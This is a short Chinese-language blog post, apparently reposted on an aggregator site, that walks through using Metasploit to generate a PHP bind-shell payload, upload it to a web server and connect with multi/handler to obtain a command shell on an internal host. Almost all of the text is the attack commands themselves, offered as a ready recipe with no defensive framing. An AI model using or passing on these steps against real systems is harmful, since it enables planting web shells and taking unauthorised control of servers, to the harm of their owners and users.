php结合msf反弹内网shell
Posted 可我浪费着我寒冷的年华
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php结合msf反弹内网shell相关的知识,希望对你有一定的参考价值。
感谢:
perl6大佬分享的姿势。
MSF:
msf > use payload/php/bind_php
msf exploit(handler) > set PAYLOAD payload/php/bind_php
msf exploit(handler) > set RHOST 目标内网ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之后就会在f盘生成xishaonian.php脚本一般都是需要修改一下,没有php标签就加个php标签之类的。
然后将xishaonian.php传到web上。
然后再次运行msf
use payload/php/bind_php
msf payload(bind_php) > set RHOST 目标外网ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run
访问web上的xishaonian.php,就可以反弹到cmdshell了。
以上是关于php结合msf反弹内网shell的主要内容,如果未能解决你的问题,请参考以下文章